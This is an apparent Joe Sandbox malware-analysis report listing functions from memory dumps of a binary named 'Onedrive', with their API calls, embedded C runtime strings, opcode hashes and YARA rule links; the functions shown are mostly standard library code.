                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$Process$Free$Allocmemmove
                                                    • String ID:
                                                    • API String ID: 3442027419-0
                                                    • Opcode ID: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                                    • Instruction ID: 6e7d999d231bf0ebc6d2f5b7755739535d2d1eaa6c5c55d1881df59525d39fd4
                                                    • Opcode Fuzzy Hash: c9fe35422332f408aca34dfc3986990ec640009ac1058576df87ad1f4ad7d076
                                                    • Instruction Fuzzy Hash: 1B319436B0975287EA15AFD76544079AA91BFA9BC1B0E8034EE1E87345DF3CE409E220
                                                    Function 00007FFDF3AE66A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE66B3
                                                      • Part of subcall function 00007FFDF3AF53C0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AF53D3
                                                      • Part of subcall function 00007FFDF3AF53C0: __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AF53DD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::_$__crt_scoped_stack_ptr
                                                    • String ID: %ls$( (_Stream.is_string_backed()) || (fn = _fileno(_Stream.public_stream()), ((_textmode_safe(fn) == __crt_lowio_text_mode::ansi) && $__acrt_stdio_char_traits<char>::validate_stream_is_ansi_if_required$minkernel\crts\ucrt\inc\corecrt_internal_stdio.h
                                                    • API String ID: 4164245112-3476576762
                                                    • Opcode ID: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                                    • Instruction ID: 601ff82054fd996d97172b35a990e05182c7aa3c8b2aedca84e4ebc804741f2c
                                                    • Opcode Fuzzy Hash: 595d77306e7c1ba2192bce2374f2339c1ebf0ddb5053516ebe0f578c2be52e6d
                                                    • Instruction Fuzzy Hash: CD41C671B1CB4296EB50CB16E460A6973A1FB81390F512631E5EE5B6ECEF3CD545CB00
                                                    Function 00007FFDF3AD5160 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 82COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_fp == invalid_function_sentinel()$cached_fp == new_fp
                                                    • API String ID: 0-3288861829
                                                    • Opcode ID: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                                    • Instruction ID: c31433414589d5bd1fe4ede24cb0c6fe8c7119dd992ffb5e6e4440b0d2df0660
                                                    • Opcode Fuzzy Hash: 81221ba029a3a9ed0e07fe46d51d06ec6f17ef045b154b741772c52cdf746db2
                                                    • Instruction Fuzzy Hash: AE413931B18B4292EB10DB15F0A0B6A77A4FB85784F910535EA9E5BBEDEF3CE1548700
                                                    Function 00007FFDF3AD52D0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 80COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$D:\a\_work\1\s\src\vctools\crt\vcruntime\src\internal\winapi_downlevel.cpp$cached_handle == INVALID_HANDLE_VALUE$cached_handle == new_handle
                                                    • API String ID: 0-3058771551
                                                    • Opcode ID: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                                    • Instruction ID: 5a060644e4723381ecdd3d6918e43c35ce33e40dabde9a3e50ef4776b31477ba
                                                    • Opcode Fuzzy Hash: 8169267e5ef227a535ec2129772ca57c7f70ec23d8b582db34dd299050f66a4c
                                                    • Instruction Fuzzy Hash: 08413B31B18A4691DB10DB16E0A4B6A73A1FB847A4F510235EABE5BBE8EF3CD1418700
                                                    Function 00007FFDF3AEBBD0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: swprintf
                                                    • String ID: %.2X $(*_errno())$minkernel\crts\ucrt\src\appcrt\heap\debug_heap.cpp$print_block_data
                                                    • API String ID: 233258989-3778139020
                                                    • Opcode ID: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                                    • Instruction ID: 84f7fdf1a1fb29de93792fe569fb6256f924251e3fb4f0825477d22c8fb8acd0
                                                    • Opcode Fuzzy Hash: f612877d82cba73926e19678f2406ce31d19ebf721c80f3c0f04ba7989c069f5
                                                    • Instruction Fuzzy Hash: D9316B7260C68185D7109B56E0A46AABBA0EBC5780F510036EADD5BBEEDF3CD480CB00
                                                    Function 00007FFDF3AFDD40 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 55COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: BuffersErrorFileFlushLast
                                                    • String ID: %ls$("Invalid file descriptor. File possibly closed by a different thread",0)$minkernel\crts\ucrt\src\appcrt\lowio\commit.cpp
                                                    • API String ID: 1917127615-1268643607
                                                    • Opcode ID: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                                    • Instruction ID: 3468b25782f34f77d9737aa8c47641c99a18f3434cbb0b2876b404fd87e436c0
                                                    • Opcode Fuzzy Hash: d635cbc310806dabc9f5e613dd8a320b68fb236f3b94d93def20512e2d93046d
                                                    • Instruction Fuzzy Hash: 6621C676B18B4686DB11AF25E4A092973A1FB84B80F814131E96D5B3ECDF3CD110C750
                                                    Function 00007FFDF3AE6200 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 54COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __crt_scoped_stack_ptr.LIBCPMTD ref: 00007FFDF3AE6216
                                                      • Part of subcall function 00007FFDF3AE66A0: Concurrency::details::_Scheduler::_Scheduler.LIBCMTD ref: 00007FFDF3AE66B3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::details::_SchedulerScheduler::___crt_scoped_stack_ptr
                                                    • String ID: %ls$__crt_stdio_output::stream_output_adapter<char>::validate$_stream.valid()$minkernel\crts\ucrt\inc\corecrt_internal_stdio_output.h
                                                    • API String ID: 614740146-3062203921
                                                    • Opcode ID: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                                    • Instruction ID: 166fd0358bcab5c851459812b5a4cfac832dcb80d898d73d23e418c8564bfd11
                                                    • Opcode Fuzzy Hash: da9eb8b382213a47e1979488ef243cce5ad89bb937ccf66715edfc33a6e5e3b0
                                                    • Instruction Fuzzy Hash: D2217A31F18B4295EB50EB52F464B6AB3A0EB80390F412435E99E5BBEDDF7CD1848B00
                                                    Function 00007FF63EA1BAA4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 46COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrToID.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BAB8
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BACB
                                                    • ?SetLayoutPos@Element@DirectUI@@QEAAJH@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BAEB
                                                    • ?SetContentString@Element@DirectUI@@QEAAJPEBG@Z.DUI70(?,?,?,00007FF63EA1B792), ref: 00007FF63EA1BB1A
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: DirectElement@$ContentDescendent@FindLayoutPos@String@V12@
                                                    • String ID: ErrorCID
                                                    • API String ID: 3607310075-3250631935
                                                    • Opcode ID: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                                    • Instruction ID: f29733f9bcd0c4c2ad92a6c1ac0b5b2a1f2ccde7a745549880fc355a24a4893e
                                                    • Opcode Fuzzy Hash: ce93dbfc43d74a60a407e702ffc4fe4b9774dc6bdd616480cdfaf7f93e13af0d
                                                    • Instruction Fuzzy Hash: 2B110C35B0CB42C7EB049BA6A490179A6E1EFA9B85B449170EA0EC7785DF2CE4089620
                                                    Function 00007FFDF3AD5480 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 28libraryCOMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: LibraryLoad$ErrorLastwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 3100911417-2084034818
                                                    • Opcode ID: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                                    • Instruction ID: 46246a2a912dad0d7b4b1a993a25a7f57e7f80ba7af673cd0f85db45e8b90a69
                                                    • Opcode Fuzzy Hash: ba16ec61bd4ea2d1e44a15f40657637409a1c94ef855eeb3ad1471bcfd6b1ded
                                                    • Instruction Fuzzy Hash: 9CF04465B1C94281E760DB13E874B2A7361FF95741F924030DE9DAAAECDF2CD545CB04
                                                    Function 00007FF63EA17F30 Relevance: 7.8, APIs: 6, Instructions: 274memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                                    • Instruction ID: 379abf1c9662477d777961319e0ccd996e59db920b78f8cb8d8ccdbb7e45930f
                                                    • Opcode Fuzzy Hash: 1fd54e66757fca2a8a023022cf3ea0a43d87e6440a2a77e324f2d085da150cf1
                                                    • Instruction Fuzzy Hash: 63B16322B08A5286FB01DBB6C4542F927A2AFA9B94F554431FE0DC7794DE3CE449D360
                                                    Function 00007FFDF3B09A00 Relevance: 7.8, APIs: 1, Strings: 4, Instructions: 264COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: %ls$_mbstowcs_l_helper$minkernel\crts\ucrt\src\appcrt\convert\mbstowcs.cpp$s != nullptr
                                                    • API String ID: 0-454128329
                                                    • Opcode ID: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                                    • Instruction ID: e9374b84409f1e19077e40817d7aeefb987013d01db7ffa39d45f4ba55a7785c
                                                    • Opcode Fuzzy Hash: 9608f6b4b14059f0dd94b12a202056abb71e65398b216d8978d4c59500cf97fc
                                                    • Instruction Fuzzy Hash: 82D11D7660CB85C5D7608B16E460B6AB3A0F7847A4F554235EAEE9BBE8DF3CD444CB00
                                                    Function 00007FF63EA129B0 Relevance: 7.6, APIs: 6, Instructions: 55memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164C0
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164D5
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA164F2
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16507
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16524
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16539
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16556
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1656B
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA16588
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA1659D
                                                      • Part of subcall function 00007FF63EA16454: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165CD
                                                      • Part of subcall function 00007FF63EA16454: HeapFree.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF63EA17F0D,?,?,?,?,00000000,00000002), ref: 00007FF63EA165E1
                                                      • Part of subcall function 00007FF63EA13AFC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA129DD), ref: 00007FF63EA13C8B
                                                      • Part of subcall function 00007FF63EA13AFC: HeapFree.KERNEL32(?,?,?,00007FF63EA129DD), ref: 00007FF63EA13C9F
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA129E6
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA129FA
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA12A29
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA12A3D
                                                    • GetProcessHeap.KERNEL32 ref: 00007FF63EA12A54
                                                    • HeapFree.KERNEL32 ref: 00007FF63EA12A68
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146149164.00007FF63EA11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF63EA10000, based on PE: true
                                                    • Associated: 00000004.00000002.4146124314.00007FF63EA10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146176721.00007FF63EA21000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146201120.00007FF63EA26000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146223529.00007FF63EA27000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ff63ea10000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: Heap$FreeProcess
                                                    • String ID:
                                                    • API String ID: 3859560861-0
                                                    • Opcode ID: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                                    • Instruction ID: 07c6dc769e07e96a2365007a6562ad7e3c1b7a800e2e3ff3e8f858b03e34749d
                                                    • Opcode Fuzzy Hash: ba35523d65e235fd164357b57aa4c4825c1f669562c9924b140f98673aebaac6
                                                    • Instruction Fuzzy Hash: DD216F32A08B4186E7049FA2E4443B8BBA0FBA9F84F498174EE0E97759DF3CD449D310
                                                    Function 00007FFDF3AD34D0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 240COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • __except_validate_context_record.LIBVCRUNTIMED ref: 00007FFDF3AD34F3
                                                      • Part of subcall function 00007FFDF3AD3F80: _guard_icall_checks_enforced.LIBCMTD ref: 00007FFDF3AD3F89
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __except_validate_context_record_guard_icall_checks_enforced
                                                    • String ID: csm
                                                    • API String ID: 95139742-1018135373
                                                    • Opcode ID: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                                    • Instruction ID: f2a4ccfcf6e84fdefb68b26e3a1f994d9659258c84a3cefbb96dab17df754307
                                                    • Opcode Fuzzy Hash: 9e062fe48b1229129d560821c3fdd2aabcdcb0dd00749ea082b421684da464b9
                                                    • Instruction Fuzzy Hash: 2EC1D936719B8186DB50CB09E490A6EF7A1F7D8790F515025EA9E8BBE8DF3CE450CB00
                                                    Function 00007FFDF3AFF550 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: ErrorLast$FileWrite
                                                    • String ID: U
                                                    • API String ID: 603252729-4171548499
                                                    • Opcode ID: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                                    • Instruction ID: 928b94e8bfec3fb6e76cc3321521e08f8f5cafd7f81d6c8e9f8f51a60913ec71
                                                    • Opcode Fuzzy Hash: 1ce957338886fed01dbc5d0847df86d0a0983a261123fab51dc7e24824622cb5
                                                    • Instruction Fuzzy Hash: 9371D736609BC58ADB60CB69E4507AAB7A1F788784F500036EADD97BA8DF7CD444CB00
                                                    Function 00007FFDF3B043F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 136COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000004.00000002.4146268479.00007FFDF3AD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDF3AD0000, based on PE: true
                                                    • Associated: 00000004.00000002.4146247530.00007FFDF3AD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146311346.00007FFDF3B12000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146340380.00007FFDF3B28000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000004.00000002.4146362300.00007FFDF3B2D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_4_2_7ffdf3ad0000_Onedrive.jbxd
                                                    Similarity
                                                    • API ID: __crt_scoped_stack_ptr
                                                    • String ID: %ls$minkernel\crts\ucrt\src\appcrt\stdio\_flsbuf.cpp$stream.valid()
                                                    • API String ID: 1704660383-221745940
                                                    • Opcode ID: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
                                                    • Instruction ID: c1eaa55f067ee812d72e6e476923fee02c5b0873b447d9f04c9b6f5b5e97d3ad
                                                    • Opcode Fuzzy Hash: 329b69d5496cb21c78686117c2c55843c180d98691ed8a2356b140e333f2deab
                                                    • Instruction Fuzzy Hash: 7A510061B0864252F710EB26E8716BF7794EBD0380F910132E6ED9E6EEDE2CD5558B40
                                                    Function 00007FF63EA1351C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123D4
                                                      • Part of subcall function 00007FF63EA122BC: HeapFree.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123E8
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1233B
                                                      • Part of subcall function 00007FF63EA122BC: HeapAlloc.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1234F
                                                      • Part of subcall function 00007FF63EA122BC: memmove.MSVCRT(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA1237C
                                                      • Part of subcall function 00007FF63EA122BC: GetProcessHeap.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA12392
                                                      • Part of subcall function 00007FF63EA122BC: HeapFree.KERNEL32(?,?,?,00007FF63EA11D5E), ref: 00007FF63EA123A6
                                                      • Part of subcall function 00007FF63EA14918: _vsnwprintf.MSVCRT ref: 00007FF63EA14958
                                                    • StrToID.DUI70 ref: 00007FF63EA135B0
                                                    • ?FindDescendent@Element@DirectUI@@QEAAPEAV12@G@Z.DUI70 ref: 00007FF63EA135C2
                                                    • ?SetInputScope@TouchEdit2@DirectUI@@QEAAJW4__MIDL___MIDL_itf_inputscope_0000_0000_0001@@@Z.DUI70 ref: 00007FF63EA135D9
